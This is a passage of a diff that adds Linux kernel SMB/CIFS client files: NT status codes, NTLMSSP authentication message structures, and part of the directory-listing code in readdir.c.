++#define NT_STATUS_REQUEST_ABORTED 0xC0000000 | 0x0240
++#define NT_STATUS_CONNECTION_ABORTED 0xC0000000 | 0x0241
++#define NT_STATUS_BAD_COMPRESSION_BUFFER 0xC0000000 | 0x0242
++#define NT_STATUS_USER_MAPPED_FILE 0xC0000000 | 0x0243
++#define NT_STATUS_AUDIT_FAILED 0xC0000000 | 0x0244
++#define NT_STATUS_TIMER_RESOLUTION_NOT_SET 0xC0000000 | 0x0245
++#define NT_STATUS_CONNECTION_COUNT_LIMIT 0xC0000000 | 0x0246
++#define NT_STATUS_LOGIN_TIME_RESTRICTION 0xC0000000 | 0x0247
++#define NT_STATUS_LOGIN_WKSTA_RESTRICTION 0xC0000000 | 0x0248
++#define NT_STATUS_IMAGE_MP_UP_MISMATCH 0xC0000000 | 0x0249
++#define NT_STATUS_INSUFFICIENT_LOGON_INFO 0xC0000000 | 0x0250
++#define NT_STATUS_BAD_DLL_ENTRYPOINT 0xC0000000 | 0x0251
++#define NT_STATUS_BAD_SERVICE_ENTRYPOINT 0xC0000000 | 0x0252
++#define NT_STATUS_LPC_REPLY_LOST 0xC0000000 | 0x0253
++#define NT_STATUS_IP_ADDRESS_CONFLICT1 0xC0000000 | 0x0254
++#define NT_STATUS_IP_ADDRESS_CONFLICT2 0xC0000000 | 0x0255
++#define NT_STATUS_REGISTRY_QUOTA_LIMIT 0xC0000000 | 0x0256
++#define NT_STATUS_PATH_NOT_COVERED 0xC0000000 | 0x0257
++#define NT_STATUS_NO_CALLBACK_ACTIVE 0xC0000000 | 0x0258
++#define NT_STATUS_LICENSE_QUOTA_EXCEEDED 0xC0000000 | 0x0259
++#define NT_STATUS_PWD_TOO_SHORT 0xC0000000 | 0x025a
++#define NT_STATUS_PWD_TOO_RECENT 0xC0000000 | 0x025b
++#define NT_STATUS_PWD_HISTORY_CONFLICT 0xC0000000 | 0x025c
++#define NT_STATUS_PLUGPLAY_NO_DEVICE 0xC0000000 | 0x025e
++#define NT_STATUS_UNSUPPORTED_COMPRESSION 0xC0000000 | 0x025f
++#define NT_STATUS_INVALID_HW_PROFILE 0xC0000000 | 0x0260
++#define NT_STATUS_INVALID_PLUGPLAY_DEVICE_PATH 0xC0000000 | 0x0261
++#define NT_STATUS_DRIVER_ORDINAL_NOT_FOUND 0xC0000000 | 0x0262
++#define NT_STATUS_DRIVER_ENTRYPOINT_NOT_FOUND 0xC0000000 | 0x0263
++#define NT_STATUS_RESOURCE_NOT_OWNED 0xC0000000 | 0x0264
++#define NT_STATUS_TOO_MANY_LINKS 0xC0000000 | 0x0265
++#define NT_STATUS_QUOTA_LIST_INCONSISTENT 0xC0000000 | 0x0266
++#define NT_STATUS_FILE_IS_OFFLINE 0xC0000000 | 0x0267
++#define NT_STATUS_NO_SUCH_JOB 0xC0000000 | 0xEDE	/* scheduler */
++
++#endif				/* _NTERR_H */
+diff --git a/fs/smb/client/ntlmssp.h b/fs/smb/client/ntlmssp.h
+new file mode 100644
+index 0000000000000..55758b9ec877e
+--- /dev/null
++++ b/fs/smb/client/ntlmssp.h
+@@ -0,0 +1,157 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2002,2007
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#define NTLMSSP_SIGNATURE "NTLMSSP"
++/* Message Types */
++#define NtLmNegotiate     cpu_to_le32(1)
++#define NtLmChallenge     cpu_to_le32(2)
++#define NtLmAuthenticate  cpu_to_le32(3)
++#define UnknownMessage    cpu_to_le32(8)
++
++/* Negotiate Flags */
++#define NTLMSSP_NEGOTIATE_UNICODE         0x01 /* Text strings are unicode */
++#define NTLMSSP_NEGOTIATE_OEM             0x02 /* Text strings are in OEM */
++#define NTLMSSP_REQUEST_TARGET            0x04 /* Srv returns its auth realm */
++/* define reserved9                       0x08 */
++#define NTLMSSP_NEGOTIATE_SIGN          0x0010 /* Request signing capability */
++#define NTLMSSP_NEGOTIATE_SEAL          0x0020 /* Request confidentiality */
++#define NTLMSSP_NEGOTIATE_DGRAM         0x0040
++#define NTLMSSP_NEGOTIATE_LM_KEY        0x0080 /* Use LM session key */
++/* defined reserved 8                   0x0100 */
++#define NTLMSSP_NEGOTIATE_NTLM          0x0200 /* NTLM authentication */
++#define NTLMSSP_NEGOTIATE_NT_ONLY       0x0400 /* Lanman not allowed */
++#define NTLMSSP_ANONYMOUS               0x0800
++#define NTLMSSP_NEGOTIATE_DOMAIN_SUPPLIED 0x1000 /* reserved6 */
++#define NTLMSSP_NEGOTIATE_WORKSTATION_SUPPLIED 0x2000
++#define NTLMSSP_NEGOTIATE_LOCAL_CALL    0x4000 /* client/server same machine */
++#define NTLMSSP_NEGOTIATE_ALWAYS_SIGN   0x8000 /* Sign. All security levels  */
++#define NTLMSSP_TARGET_TYPE_DOMAIN     0x10000
++#define NTLMSSP_TARGET_TYPE_SERVER     0x20000
++#define NTLMSSP_TARGET_TYPE_SHARE      0x40000
++#define NTLMSSP_NEGOTIATE_EXTENDED_SEC 0x80000 /* NB:not related to NTLMv2 pwd*/
++/* #define NTLMSSP_REQUEST_INIT_RESP     0x100000 */
++#define NTLMSSP_NEGOTIATE_IDENTIFY    0x100000
++#define NTLMSSP_REQUEST_ACCEPT_RESP   0x200000 /* reserved5 */
++#define NTLMSSP_REQUEST_NON_NT_KEY    0x400000
++#define NTLMSSP_NEGOTIATE_TARGET_INFO 0x800000
++/* #define reserved4                 0x1000000 */
++#define NTLMSSP_NEGOTIATE_VERSION    0x2000000 /* we only set for SMB2+ */
++/* #define reserved3                 0x4000000 */
++/* #define reserved2                 0x8000000 */
++/* #define reserved1                0x10000000 */
++#define NTLMSSP_NEGOTIATE_128       0x20000000
++#define NTLMSSP_NEGOTIATE_KEY_XCH   0x40000000
++#define NTLMSSP_NEGOTIATE_56        0x80000000
++
++/* Define AV Pair Field IDs */
++enum av_field_type {
++	NTLMSSP_AV_EOL = 0,
++	NTLMSSP_AV_NB_COMPUTER_NAME,
++	NTLMSSP_AV_NB_DOMAIN_NAME,
++	NTLMSSP_AV_DNS_COMPUTER_NAME,
++	NTLMSSP_AV_DNS_DOMAIN_NAME,
++	NTLMSSP_AV_DNS_TREE_NAME,
++	NTLMSSP_AV_FLAGS,
++	NTLMSSP_AV_TIMESTAMP,
++	NTLMSSP_AV_RESTRICTION,
++	NTLMSSP_AV_TARGET_NAME,
++	NTLMSSP_AV_CHANNEL_BINDINGS
++};
++
++/* Although typedefs are not commonly used for structure definitions */
++/* in the Linux kernel, in this particular case they are useful      */
++/* to more closely match the standards document for NTLMSSP from     */
++/* OpenGroup and to make the code more closely match the standard in */
++/* appearance */
++
++typedef struct _SECURITY_BUFFER {
++	__le16 Length;
++	__le16 MaximumLength;
++	__le32 BufferOffset;	/* offset to buffer */
++} __attribute__((packed)) SECURITY_BUFFER;
++
++typedef struct _NEGOTIATE_MESSAGE {
++	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
++	__le32 MessageType;     /* NtLmNegotiate = 1 */
++	__le32 NegotiateFlags;
++	SECURITY_BUFFER DomainName;	/* RFC 1001 style and ASCII */
++	SECURITY_BUFFER WorkstationName;	/* RFC 1001 and ASCII */
++	/* SECURITY_BUFFER for version info not present since we
++	   do not set the version is present flag */
++	char DomainString[0];
++	/* followed by WorkstationString */
++} __attribute__((packed)) NEGOTIATE_MESSAGE, *PNEGOTIATE_MESSAGE;
++
++#define NTLMSSP_REVISION_W2K3 0x0F
++
++/* See MS-NLMP section 2.2.2.10 */
++struct ntlmssp_version {
++	__u8	ProductMajorVersion;
++	__u8	ProductMinorVersion;
++	__le16	ProductBuild; /* we send the cifs.ko module version here */
++	__u8	Reserved[3];
++	__u8	NTLMRevisionCurrent; /* currently 0x0F */
++} __packed;
++
++/* see MS-NLMP section 2.2.1.1 */
++struct negotiate_message {
++	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
++	__le32 MessageType;     /* NtLmNegotiate = 1 */
++	__le32 NegotiateFlags;
++	SECURITY_BUFFER DomainName;	/* RFC 1001 style and ASCII */
++	SECURITY_BUFFER WorkstationName;	/* RFC 1001 and ASCII */
++	struct	ntlmssp_version Version;
++	/* SECURITY_BUFFER */
++	char DomainString[];
++	/* followed by WorkstationString */
++} __packed;
++
++typedef struct _CHALLENGE_MESSAGE {
++	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
++	__le32 MessageType;   /* NtLmChallenge = 2 */
++	SECURITY_BUFFER TargetName;
++	__le32 NegotiateFlags;
++	__u8 Challenge[CIFS_CRYPTO_KEY_SIZE];
++	__u8 Reserved[8];
++	SECURITY_BUFFER TargetInfoArray;
++	/* SECURITY_BUFFER for version info not present since we
++	   do not set the version is present flag */
++} __attribute__((packed)) CHALLENGE_MESSAGE, *PCHALLENGE_MESSAGE;
++
++typedef struct _AUTHENTICATE_MESSAGE {
++	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
++	__le32 MessageType;  /* NtLmsAuthenticate = 3 */
++	SECURITY_BUFFER LmChallengeResponse;
++	SECURITY_BUFFER NtChallengeResponse;
++	SECURITY_BUFFER DomainName;
++	SECURITY_BUFFER UserName;
++	SECURITY_BUFFER WorkstationName;
++	SECURITY_BUFFER SessionKey;
++	__le32 NegotiateFlags;
++	/* SECURITY_BUFFER for version info not present since we
++	   do not set the version is present flag */
++	char UserString[0];
++} __attribute__((packed)) AUTHENTICATE_MESSAGE, *PAUTHENTICATE_MESSAGE;
++
++/*
++ * Size of the session key (crypto key encrypted with the password
++ */
++
++int decode_ntlmssp_challenge(char *bcc_ptr, int blob_len, struct cifs_ses *ses);
++int build_ntlmssp_negotiate_blob(unsigned char **pbuffer, u16 *buflen,
++				 struct cifs_ses *ses,
++				 struct TCP_Server_Info *server,
++				 const struct nls_table *nls_cp);
++int build_ntlmssp_smb3_negotiate_blob(unsigned char **pbuffer, u16 *buflen,
++				 struct cifs_ses *ses,
++				 struct TCP_Server_Info *server,
++				 const struct nls_table *nls_cp);
++int build_ntlmssp_auth_blob(unsigned char **pbuffer, u16 *buflen,
++			struct cifs_ses *ses,
++			struct TCP_Server_Info *server,
++			const struct nls_table *nls_cp);
+diff --git a/fs/smb/client/readdir.c b/fs/smb/client/readdir.c
+new file mode 100644
+index 0000000000000..2d75ba5aaa8ad
+--- /dev/null
++++ b/fs/smb/client/readdir.c
+@@ -0,0 +1,1237 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Directory search handling
++ *
++ *   Copyright (C) International Business Machines  Corp., 2004, 2008
++ *   Copyright (C) Red Hat, Inc., 2011
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++#include <linux/fs.h>
++#include <linux/pagemap.h>
++#include <linux/slab.h>
++#include <linux/stat.h>
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_unicode.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "cifsfs.h"
++#include "smb2proto.h"
++#include "fs_context.h"
++#include "cached_dir.h"
++
++/*
++ * To be safe - for UCS to UTF-8 with strings loaded with the rare long
++ * characters alloc more to account for such multibyte target UTF-8
++ * characters.
++ */
++#define UNICODE_NAME_MAX ((4 * NAME_MAX) + 2)
++
++#ifdef CONFIG_CIFS_DEBUG2
++static void dump_cifs_file_struct(struct file *file, char *label)
++{
++	struct cifsFileInfo *cf;
++
++	if (file) {
++		cf = file->private_data;
++		if (cf == NULL) {
++			cifs_dbg(FYI, "empty cifs private file data\n");
++			return;
++		}
++		if (cf->invalidHandle)
++			cifs_dbg(FYI, "Invalid handle\n");
++		if (cf->srch_inf.endOfSearch)
++			cifs_dbg(FYI, "end of search\n");
++		if (cf->srch_inf.emptyDir)
++			cifs_dbg(FYI, "empty dir\n");
++	}
++}
++#else
++static inline void dump_cifs_file_struct(struct file *file, char *label)
++{
++}
++#endif /* DEBUG2 */
++
++/*
++ * Attempt to preload the dcache with the results from the FIND_FIRST/NEXT
++ *
++ * Find the dentry that matches "name". If there isn't one, create one. If it's
++ * a negative dentry or the uniqueid or filetype(mode) changed,
++ * then drop it and recreate it.
++ */
++static void
++cifs_prime_dcache(struct dentry *parent, struct qstr *name,
++		    struct cifs_fattr *fattr)
++{
++	struct dentry *dentry, *alias;
++	struct inode *inode;
++	struct super_block *sb = parent->d_sb;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	DECLARE_WAIT_QUEUE_HEAD_ONSTACK(wq);
++
++	cifs_dbg(FYI, "%s: for %s\n", __func__, name->name);
++
++	dentry = d_hash_and_lookup(parent, name);
++	if (!dentry) {
++		/*
++		 * If we know that the inode will need to be revalidated
++		 * immediately, then don't create a new dentry for it.
++		 * We'll end up doing an on the wire call either way and
++		 * this spares us an invalidation.
++		 */
++		if (fattr->cf_flags & CIFS_FATTR_NEED_REVAL)
++			return;
++retry:
++		dentry = d_alloc_parallel(parent, name, &wq);
++	}
++	if (IS_ERR(dentry))
++		return;
++	if (!d_in_lookup(dentry)) {
++		inode = d_inode(dentry);
++		if (inode) {
++			if (d_mountpoint(dentry)) {
++				dput(dentry);
++				return;
++			}
++			/*
++			 * If we're generating inode numbers, then we don't
++			 * want to clobber the existing one with the one that
++			 * the readdir code created.
++			 */
++			if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM))
++				fattr->cf_uniqueid = CIFS_I(inode)->uniqueid;
++
++			/* update inode in place
++			 * if both i_ino and i_mode didn't change */
++			if (CIFS_I(inode)->uniqueid == fattr->cf_uniqueid &&
++			    cifs_fattr_to_inode(inode, fattr) == 0) {
++				dput(dentry);
++				return;
++			}
++		}
++		d_invalidate(dentry);
++		dput(dentry);
++		goto retry;
++	} else {
++		inode = cifs_iget(sb, fattr);
++		if (!inode)
++			inode = ERR_PTR(-ENOMEM);
++		alias = d_splice_alias(inode, dentry);
++		d_lookup_done(dentry);
++		if (alias && !IS_ERR(alias))
++			dput(alias);
++	}
++	dput(dentry);
++}
++
++static bool reparse_file_needs_reval(const struct cifs_fattr *fattr)
++{
++	if (!(fattr->cf_cifsattrs & ATTR_REPARSE))
++		return false;
++	/*
++	 * The DFS tags should be only intepreted by server side as per
++	 * MS-FSCC 2.1.2.1, but let's include them anyway.
++	 *
++	 * Besides, if cf_cifstag is unset (0), then we still need it to be
++	 * revalidated to know exactly what reparse point it is.
++	 */
++	switch (fattr->cf_cifstag) {
++	case IO_REPARSE_TAG_DFS:
++	case IO_REPARSE_TAG_DFSR:
++	case IO_REPARSE_TAG_SYMLINK:
++	case IO_REPARSE_TAG_NFS:
++	case 0:
++		return true;
++	}
++	return false;
++}
++
++static void
++cifs_fill_common_info(struct cifs_fattr *fattr, struct cifs_sb_info *cifs_sb)
++{
++	fattr->cf_uid = cifs_sb->ctx->linux_uid;
++	fattr->cf_gid = cifs_sb->ctx->linux_gid;
++
++	/*
++	 * The IO_REPARSE_TAG_LX_ tags originally were used by WSL but they
++	 * are preferred by the Linux client in some cases since, unlike
++	 * the NFS reparse tag (or EAs), they don't require an extra query
++	 * to determine which type of special file they represent.
++	 * TODO: go through all documented  reparse tags to see if we can
++	 * reasonably map some of them to directories vs. files vs. symlinks
++	 */
++	if (fattr->cf_cifsattrs & ATTR_DIRECTORY) {
++		fattr->cf_mode = S_IFDIR | cifs_sb->ctx->dir_mode;
++		fattr->cf_dtype = DT_DIR;
++	} else if (fattr->cf_cifstag == IO_REPARSE_TAG_LX_SYMLINK) {
++		fattr->cf_mode |= S_IFLNK | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_LNK;
++	} else if (fattr->cf_cifstag == IO_REPARSE_TAG_LX_FIFO) {
++		fattr->cf_mode |= S_IFIFO | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_FIFO;
++	} else if (fattr->cf_cifstag == IO_REPARSE_TAG_AF_UNIX) {
++		fattr->cf_mode |= S_IFSOCK | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_SOCK;
++	} else if (fattr->cf_cifstag == IO_REPARSE_TAG_LX_CHR) {
++		fattr->cf_mode |= S_IFCHR | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_CHR;
++	} else if (fattr->cf_cifstag == IO_REPARSE_TAG_LX_BLK) {
++		fattr->cf_mode |= S_IFBLK | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_BLK;
++	} else { /* TODO: should we mark some other reparse points (like DFSR) as directories? */
++		fattr->cf_mode = S_IFREG | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_REG;
++	}
++
++	/*
++	 * We need to revalidate it further to make a decision about whether it
++	 * is a symbolic link, DFS referral or a reparse point with a direct
++	 * access like junctions, deduplicated files, NFS symlinks.
++	 */
++	if (reparse_file_needs_reval(fattr))
++		fattr->cf_flags |= CIFS_FATTR_NEED_REVAL;
++
++	/* non-unix readdir doesn't provide nlink */
++	fattr->cf_flags |= CIFS_FATTR_UNKNOWN_NLINK;
++
++	if (fattr->cf_cifsattrs & ATTR_READONLY)
++		fattr->cf_mode &= ~S_IWUGO;
++
++	/*
++	 * We of course don't get ACL info in FIND_FIRST/NEXT results, so
++	 * mark it for revalidation so that "ls -l" will look right. It might
++	 * be super-slow, but if we don't do this then the ownership of files
++	 * may look wrong since the inodes may not have timed out by the time
++	 * "ls" does a stat() call on them.
++	 */
++	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) ||
++	    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID))
++		fattr->cf_flags |= CIFS_FATTR_NEED_REVAL;
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL &&
++	    fattr->cf_cifsattrs & ATTR_SYSTEM) {
++		if (fattr->cf_eof == 0)  {
++			fattr->cf_mode &= ~S_IFMT;
++			fattr->cf_mode |= S_IFIFO;
++			fattr->cf_dtype = DT_FIFO;
++		} else {
++			/*
++			 * trying to get the type and mode via SFU can be slow,
++			 * so just call those regular files for now, and mark
++			 * for reval
++			 */
++			fattr->cf_flags |= CIFS_FATTR_NEED_REVAL;
++		}
++	}
++}
++
++/* Fill a cifs_fattr struct with info from SMB_FIND_FILE_POSIX_INFO. */
++static void
++cifs_posix_to_fattr(struct cifs_fattr *fattr, struct smb2_posix_info *info,
++		    struct cifs_sb_info *cifs_sb)
++{
++	struct smb2_posix_info_parsed parsed;
++
++	posix_info_parse(info, NULL, &parsed);
++
++	memset(fattr, 0, sizeof(*fattr));
++	fattr->cf_uniqueid = le64_to_cpu(info->Inode);
++	fattr->cf_bytes = le64_to_cpu(info->AllocationSize);
++	fattr->cf_eof = le64_to_cpu(info->EndOfFile);
++
++	fattr->cf_atime = cifs_NTtimeToUnix(info->LastAccessTime);
++	fattr->cf_mtime = cifs_NTtimeToUnix(info->LastWriteTime);
++	fattr->cf_ctime = cifs_NTtimeToUnix(info->CreationTime);
++
++	fattr->cf_nlink = le32_to_cpu(info->HardLinks);
++	fattr->cf_cifsattrs = le32_to_cpu(info->DosAttributes);
++
++	/*
++	 * Since we set the inode type below we need to mask off
++	 * to avoid strange results if bits set above.
++	 * XXX: why not make server&client use the type bits?
++	 */
++	fattr->cf_mode = le32_to_cpu(info->Mode) & ~S_IFMT;
++
++	cifs_dbg(FYI, "posix fattr: dev %d, reparse %d, mode %o\n",
++		 le32_to_cpu(info->DeviceId),
++		 le32_to_cpu(info->ReparseTag),
++		 le32_to_cpu(info->Mode));
++
++	if (fattr->cf_cifsattrs & ATTR_DIRECTORY) {
++		fattr->cf_mode |= S_IFDIR;
++		fattr->cf_dtype = DT_DIR;
++	} else {
++		/*
++		 * mark anything that is not a dir as regular
++		 * file. special files should have the REPARSE
++		 * attribute and will be marked as needing revaluation
++		 */
++		fattr->cf_mode |= S_IFREG;
++		fattr->cf_dtype = DT_REG;
++	}
++
++	if (reparse_file_needs_reval(fattr))
++		fattr->cf_flags |= CIFS_FATTR_NEED_REVAL;
++
++	sid_to_id(cifs_sb, &parsed.owner, fattr, SIDOWNER);
++	sid_to_id(cifs_sb, &parsed.group, fattr, SIDGROUP);
++}
++
++static void __dir_info_to_fattr(struct cifs_fattr *fattr, const void *info)
++{
++	const FILE_DIRECTORY_INFO *fi = info;
++
++	memset(fattr, 0, sizeof(*fattr));
++	fattr->cf_cifsattrs = le32_to_cpu(fi->ExtFileAttributes);
++	fattr->cf_eof = le64_to_cpu(fi->EndOfFile);
++	fattr->cf_bytes = le64_to_cpu(fi->AllocationSize);
++	fattr->cf_createtime = le64_to_cpu(fi->CreationTime);
++	fattr->cf_atime = cifs_NTtimeToUnix(fi->LastAccessTime);
++	fattr->cf_ctime = cifs_NTtimeToUnix(fi->ChangeTime);
++	fattr->cf_mtime = cifs_NTtimeToUnix(fi->LastWriteTime);
++}
++
++void
++cifs_dir_info_to_fattr(struct cifs_fattr *fattr, FILE_DIRECTORY_INFO *info,
++		       struct cifs_sb_info *cifs_sb)
++{
++	__dir_info_to_fattr(fattr, info);
++	cifs_fill_common_info(fattr, cifs_sb);
++}
++
++static void cifs_fulldir_info_to_fattr(struct cifs_fattr *fattr,
++				       SEARCH_ID_FULL_DIR_INFO *info,
++				       struct cifs_sb_info *cifs_sb)
++{
++	__dir_info_to_fattr(fattr, info);
++
++	/* See MS-FSCC 2.4.19 FileIdFullDirectoryInformation */
++	if (fattr->cf_cifsattrs & ATTR_REPARSE)
++		fattr->cf_cifstag = le32_to_cpu(info->EaSize);
++	cifs_fill_common_info(fattr, cifs_sb);
++}
++
++static void
++cifs_std_info_to_fattr(struct cifs_fattr *fattr, FIND_FILE_STANDARD_INFO *info,
++		       struct cifs_sb_info *cifs_sb)
++{
++	int offset = cifs_sb_master_tcon(cifs_sb)->ses->server->timeAdj;
++
++	memset(fattr, 0, sizeof(*fattr));
++	fattr->cf_atime = cnvrtDosUnixTm(info->LastAccessDate,
++					    info->LastAccessTime, offset);
++	fattr->cf_ctime = cnvrtDosUnixTm(info->LastWriteDate,
++					    info->LastWriteTime, offset);
++	fattr->cf_mtime = cnvrtDosUnixTm(info->LastWriteDate,
++					    info->LastWriteTime, offset);
++
++	fattr->cf_cifsattrs = le16_to_cpu(info->Attributes);
++	fattr->cf_bytes = le32_to_cpu(info->AllocationSize);
++	fattr->cf_eof = le32_to_cpu(info->DataSize);
++
++	cifs_fill_common_info(fattr, cifs_sb);
++}
++
++/* BB eventually need to add the following helper function to
++      resolve NT_STATUS_STOPPED_ON_SYMLINK return code when
++      we try to do FindFirst on (NTFS) directory symlinks */
++/*
++int get_symlink_reparse_path(char *full_path, struct cifs_sb_info *cifs_sb,
++			     unsigned int xid)
++{
++	__u16 fid;
++	int len;
++	int oplock = 0;
++	int rc;
++	struct cifs_tcon *ptcon = cifs_sb_tcon(cifs_sb);
++	char *tmpbuffer;
++
++	rc = CIFSSMBOpen(xid, ptcon, full_path, FILE_OPEN, GENERIC_READ,
++			OPEN_REPARSE_POINT, &fid, &oplock, NULL,
++			cifs_sb->local_nls,
++			cifs_remap(cifs_sb);
++	if (!rc) {
++		tmpbuffer = kmalloc(maxpath);
++		rc = CIFSSMBQueryReparseLinkInfo(xid, ptcon, full_path,
++				tmpbuffer,
++				maxpath -1,
++				fid,
++				cifs_sb->local_nls);
++		if (CIFSSMBClose(xid, ptcon, fid)) {
++			cifs_dbg(FYI, "Error closing temporary reparsepoint open\n");
++		}
++	}
++}
++ */
++
++static int
++_initiate_cifs_search(const unsigned int xid, struct file *file,
++		     const char *full_path)
++{
++	__u16 search_flags;
++	int rc = 0;
++	struct cifsFileInfo *cifsFile;
++	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(file);
++	struct tcon_link *tlink = NULL;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++
++	if (file->private_data == NULL) {
++		tlink = cifs_sb_tlink(cifs_sb);
++		if (IS_ERR(tlink))
++			return PTR_ERR(tlink);
++
++		cifsFile = kzalloc(sizeof(struct cifsFileInfo), GFP_KERNEL);
++		if (cifsFile == NULL) {
++			rc = -ENOMEM;
++			goto error_exit;
++		}
++		spin_lock_init(&cifsFile->file_info_lock);
++		file->private_data = cifsFile;
++		cifsFile->tlink = cifs_get_tlink(tlink);
++		tcon = tlink_tcon(tlink);
++	} else {
++		cifsFile = file->private_data;
++		tcon = tlink_tcon(cifsFile->tlink);
++	}
++
++	server = tcon->ses->server;
++
++	if (!server->ops->query_dir_first) {
++		rc = -ENOSYS;
++		goto error_exit;
++	}
++
++	cifsFile->invalidHandle = true;
++	cifsFile->srch_inf.endOfSearch = false;
++
++	cifs_dbg(FYI, "Full path: %s start at: %lld\n", full_path, file->f_pos);
++
++ffirst_retry:
++	/* test for Unix extensions */
++	/* but now check for them on the share/mount not on the SMB session */
++	/* if (cap_unix(tcon->ses) { */
++	if (tcon->unix_ext)
++		cifsFile->srch_inf.info_level = SMB_FIND_FILE_UNIX;
++	else if (tcon->posix_extensions)
++		cifsFile->srch_inf.info_level = SMB_FIND_FILE_POSIX_INFO;
++	else if ((tcon->ses->capabilities &
++		  tcon->ses->server->vals->cap_nt_find) == 0) {
++		cifsFile->srch_inf.info_level = SMB_FIND_FILE_INFO_STANDARD;
++	} else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) {
++		cifsFile->srch_inf.info_level = SMB_FIND_FILE_ID_FULL_DIR_INFO;
++	} else /* not srvinos - BB fixme add check for backlevel? */ {
++		cifsFile->srch_inf.info_level = SMB_FIND_FILE_DIRECTORY_INFO;
++	}
++
++	search_flags = CIFS_SEARCH_CLOSE_AT_END | CIFS_SEARCH_RETURN_RESUME;
++	if (backup_cred(cifs_sb))
++		search_flags |= CIFS_SEARCH_BACKUP_SEARCH;
++
++	rc = server->ops->query_dir_first(xid, tcon, full_path, cifs_sb,
++					  &cifsFile->fid, search_flags,
++					  &cifsFile->srch_inf);
++
++	if (rc == 0)
++		cifsFile->invalidHandle = false;
++	/* BB add following call to handle readdir on new NTFS symlink errors
++	else if STATUS_STOPPED_ON_SYMLINK
++		call get_symlink_reparse_path and retry with new path */
++	else if ((rc == -EOPNOTSUPP) &&
++		(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)) {
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_SERVER_INUM;
++		goto ffirst_retry;
++	}
++error_exit:
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
++static int
++initiate_cifs_search(const unsigned int xid, struct file *file,
++		     const char *full_path)
++{
++	int rc, retry_count = 0;
++
++	do {
++		rc = _initiate_cifs_search(xid, file, full_path);
++		/*
++		 * If we don't have enough credits to start reading the
++		 * directory just try again after short wait.
++		 */
++		if (rc != -EDEADLK)
++			break;
++
++		usleep_range(512, 2048);
++	} while (retry_count++ < 5);
++
++	return rc;
++}
++
++/* return length of unicode string in bytes */
++static int cifs_unicode_bytelen(const char *str)
++{
++	int len;
++	const __le16 *ustr = (const __le16 *)str;
++
++	for (len = 0; len <= PATH_MAX; len++) {
++		if (ustr[len] == 0)
++			return len << 1;
++	}
++	cifs_dbg(FYI, "Unicode string longer than PATH_MAX found\n");
++	return len << 1;
++}
++
++static char *nxt_dir_entry(char *old_entry, char *end_of_smb, int level)
++{
++	char *new_entry;
++	FILE_DIRECTORY_INFO *pDirInfo = (FILE_DIRECTORY_INFO *)old_entry;
++
++	if (level == SMB_FIND_FILE_INFO_STANDARD) {
++		FIND_FILE_STANDARD_INFO *pfData;
++		pfData = (FIND_FILE_STANDARD_INFO *)pDirInfo;
++
++		new_entry = old_entry + sizeof(FIND_FILE_STANDARD_INFO) +
++				pfData->FileNameLength;
++	} else {
++		u32 next_offset = le32_to_cpu(pDirInfo->NextEntryOffset);
++
++		if (old_entry + next_offset < old_entry) {
++			cifs_dbg(VFS, "Invalid offset %u\n", next_offset);
++			return NULL;
++		}
++		new_entry = old_entry + next_offset;
++	}
++	cifs_dbg(FYI, "new entry %p old entry %p\n", new_entry, old_entry);
++	/* validate that new_entry is not past end of SMB */
++	if (new_entry >= end_of_smb) {
++		cifs_dbg(VFS, "search entry %p began after end of SMB %p old entry %p\n",
++			 new_entry, end_of_smb, old_entry);
++		return NULL;
++	} else if (((level == SMB_FIND_FILE_INFO_STANDARD) &&
++		    (new_entry + sizeof(FIND_FILE_STANDARD_INFO) > end_of_smb))
++		  || ((level != SMB_FIND_FILE_INFO_STANDARD) &&
++		   (new_entry + sizeof(FILE_DIRECTORY_INFO) > end_of_smb)))  {
++		cifs_dbg(VFS, "search entry %p extends after end of SMB %p\n",
++			 new_entry, end_of_smb);
++		return NULL;
++	} else
++		return new_entry;
++
++}
++
++struct cifs_dirent {
++	const char	*name;
++	size_t		namelen;
++	u32		resume_key;
++	u64		ino;
++};
++
++static void cifs_fill_dirent_posix(struct cifs_dirent *de,
++				   const struct smb2_posix_info *info)
++{
++	struct smb2_posix_info_parsed parsed;
++
++	/* payload should have already been checked at this point */
++	if (posix_info_parse(info, NULL, &parsed) < 0) {
++		cifs_dbg(VFS, "Invalid POSIX info payload\n");
++		return;
++	}
++
++	de->name = parsed.name;
++	de->namelen = parsed.name_len;
++	de->resume_key = info->Ignored;
++	de->ino = le64_to_cpu(info->Inode);
++}
++
++static void cifs_fill_dirent_unix(struct cifs_dirent *de,
++		const FILE_UNIX_INFO *info, bool is_unicode)
++{
++	de->name = &info->FileName[0];
++	if (is_unicode)
++		de->namelen = cifs_unicode_bytelen(de->name);
++	else
++		de->namelen = strnlen(de->name, PATH_MAX);
++	de->resume_key = info->ResumeKey;
++	de->ino = le64_to_cpu(info->basic.UniqueId);
++}
++
++static void cifs_fill_dirent_dir(struct cifs_dirent *de,
